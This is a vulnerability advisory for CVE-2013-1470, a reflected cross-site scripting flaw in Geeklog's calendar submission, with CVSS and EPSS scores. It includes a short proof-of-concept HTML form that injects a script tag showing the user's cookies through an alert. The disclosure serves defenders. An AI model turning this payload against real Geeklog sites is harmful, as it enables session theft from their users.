Lucene search

K
htbridgeHigh-Tech BridgeHTB23143
HistoryFeb 06, 2013 - 12:00 a.m.

Cross-Site Scripting (XSS) in Geeklog

2013-02-0600:00:00
High-Tech Bridge
www.htbridge.com
36

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

66.7%

High-Tech Bridge Security Research Lab discovered vulnerability in Geeklog that can be exploited to perform Cross-Site Scripting (XSS) attacks.

  1. Cross-Site Scripting (XSS) in Geeklog: CVE-2013-1470
    The vulnerability exists due to insufficient filtration of user-supplied data in “calendar_type” HTTP POST parameter passed to “/calendar/index.php” script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in his browser in context of the vulnerable website.
    The exploitation example below uses the “alert()” JavaScript function to display user’s cookies:
    <form action=“http://[host]/submit.php?type=calendar” method=“post”>
    <input type=“hidden” name=“mode” value=“Submit”>
    <input type=“hidden” name=“calendar_type” value=‘"><script>alert(document.cookie);</script>’>
    <input type=“submit” id=“btn”>
    </form>
CPENameOperatorVersion
geeklog le1.8.2

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

66.7%